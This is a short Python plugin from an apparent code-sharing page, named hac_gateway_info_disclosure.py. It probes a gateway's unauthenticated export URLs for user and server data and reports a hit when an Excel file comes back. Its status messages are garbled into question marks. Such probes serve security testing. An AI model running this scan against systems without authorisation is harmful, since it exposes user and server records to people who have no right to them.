def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payloads = ["/excel/sso_user_export.php",
"/excel/user_export.php",
"/excel/server_export.php"]
try:
for payload in payloads:
vulnurl = self.url + payload
req = requests.head(vulnurl, headers=headers, timeout=10, verify=False)
if r"application/vnd.ms-excel" in req.headers["Content-Type"]:
cprint("[+]???????????????...(??)\tpayload: "+vulnurl, "yellow")
except:
cprint("[-] "+__file__+"====>????", "cyan")
hac_gateway_info_disclosure.py 文件源码
python
阅读 26
收藏 0
点赞 0
评论 0
评论列表
文章目录